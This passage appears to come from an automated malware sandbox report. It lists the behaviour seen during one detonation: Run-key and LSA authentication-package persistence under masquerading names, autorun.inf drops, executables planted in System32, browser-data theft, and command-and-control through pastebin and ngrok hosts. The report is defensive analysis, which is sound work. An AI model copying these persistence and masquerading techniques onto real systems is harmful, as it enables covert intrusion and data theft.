N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\ProgramData\Bitdefender\$77-Bitdefender.exe N/A
N/A N/A C:\ProgramData\Bitdefender\$77-Bitdefender.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\99999.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\99999.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" \??\c:\program files (x86)\internet explorer\iexplore.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" \??\c:\program files (x86)\internet explorer\iexplore.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SCSI Host = "C:\\Program Files (x86)\\SCSI Host\\scsihost.exe" C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Network = "C:\\Users\\Admin\\AppData\\Roaming\\Network.exe" C:\Users\Admin\AppData\Local\Temp\a\Network.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SCSI Host = "C:\\Program Files (x86)\\SCSI Host\\scsihost.exe" C:\Users\Admin\AppData\Local\Temp\a\jij.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" C:\ProgramData\Bitdefender\$77-Bitdefender.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" C:\ProgramData\Bitdefender\$77-Bitdefender.exe N/A

Checks whether UAC is enabled

defense_evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\a\jij.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A 0.tcp.eu.ngrok.io N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A 0.tcp.eu.ngrok.io N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A 0.tcp.in.ngrok.io N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A 0.tcp.eu.ngrok.io N/A N/A
N/A pastebin.com N/A N/A
N/A 2.tcp.eu.ngrok.io N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Boot or Logon Autostart Execution: Authentication Package

persistence privilege_escalation
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800300063006500660037006400310030006400380066003400350039006600630029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 C:\Windows\system32\msiexec.exe N/A

Drops autorun.inf file

Description Indicator Process Target
File created C:\autorun.inf C:\Users\Admin\AppData\Roaming\server.exe N/A
File opened for modification C:\autorun.inf C:\Users\Admin\AppData\Roaming\server.exe N/A
File created F:\autorun.inf C:\Users\Admin\AppData\Roaming\server.exe N/A
File opened for modification F:\autorun.inf C:\Users\Admin\AppData\Roaming\server.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\dll32 C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\system32\Windows Shell Interactive.exe C:\Windows\system32\Windows Shell Interactive.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File created C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\system32\dll32\msinfo32.exe C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\system32\Windows Shell Interactive.exe C:\Windows\system32\Windows Shell Interactive.exe N/A
File opened for modification C:\Windows\system32\dll32\msinfo32.exe C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\system32\dll32 C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\system32\dll32\msinfo32.exe C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\system32\dll32 C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\system32\dll32 C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\system32\dll32 C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\system32\Windows Shell Interactive.exe C:\Windows\system32\Windows Shell Interactive.exe N/A
File opened for modification C:\Windows\system32\dll32\msinfo32.exe C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\system32\Windows Shell Interactive.exe C:\Windows\system32\Windows Shell Interactive.exe N/A
File opened for modification C:\Windows\system32\dll32\msinfo32.exe C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\system32\Windows Shell Interactive.exe C:\Users\Admin\AppData\Local\Temp\a\Client.exe N/A
File opened for modification C:\Windows\system32\dll32 C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\system32\Windows Shell Interactive.exe C:\Windows\system32\Windows Shell Interactive.exe N/A
File created C:\Windows\system32\Windows Shell Interactive.exe C:\Users\Admin\AppData\Local\Temp\a\Client.exe N/A
File opened for modification C:\Windows\system32\dll32 C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\system32\dll32\msinfo32.exe C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\system32\dll32\msinfo32.exe C:\Windows\system32\dll32\msinfo32.exe N/A
File created C:\Windows\system32\dll32\msinfo32.exe C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe N/A
File opened for modification C:\Windows\system32\dll32\msinfo32.exe C:\Windows\system32\dll32\msinfo32.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (0cef7d10d8f459fc)\bzdjfdvz.newcfg C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\system32\Windows Shell Interactive.exe C:\Windows\system32\Windows Shell Interactive.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\system32\dll32\msinfo32.exe C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (0cef7d10d8f459fc)\bzdjfdvz.tmp C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\system32\dll32 C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\system32\dll32 C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe N/A
File opened for modification C:\Windows\SysWOW64\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Windows\system32\dll32\msinfo32.exe C:\Windows\system32\dll32\msinfo32.exe N/A
File opened for modification C:\Windows\system32\Windows Shell Interactive.exe C:\Windows\system32\Windows Shell Interactive.exe N/A
File opened for modification C:\Windows\system32\Windows Shell Interactive.exe C:\Windows\system32\Windows Shell Interactive.exe N/A
File opened for modification C:\Windows\system32\dll32 C:\Windows\system32\dll32\msinfo32.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\SCSI Host\scsihost.exe C:\Users\Admin\AppData\Local\Temp\a\jij.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File created C:\Program Files (x86)\SCSI Host\scsihost.exe C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.Core.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsBackstageShell.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsCredentialProvider.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsFileManager.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Program Files (x86)\SCSI Host\scsihost.exe C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\Client.Override.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\Client.resources C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\app.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\Client.Override.en-US.resources C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\SCSI Host\scsihost.exe C:\Users\Admin\AppData\Local\Temp\a\jij.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsFileManager.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\Client.en-US.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\system.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsAuthenticationPackage.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.Client.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.Windows.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsBackstageShell.exe.config C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Explower.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\f7703e7.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI148D.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{85F34968-1C69-C400-0998-25E265AEE9E4}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev3 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev1 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\Installer\f7703e7.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIED1.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f7703ea.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\ViBases C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
File created C:\Windows\Installer\f7703e8.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{85F34968-1C69-C400-0998-25E265AEE9E4}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f7703e8.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\ImmediatelyBros C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
File opened for modification C:\Windows\OxfordPrintable C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
File opened for modification C:\Windows\TransferRare C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
File opened for modification C:\Windows\EscortsNascar C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
File opened for modification C:\Windows\NavyPromising C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
File opened for modification C:\Windows\Installer\MSIB76.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\wix{85F34968-1C69-C400-0998-25E265AEE9E4}.SchedServiceConfig.rmi C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\HonoluluSyndrome C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
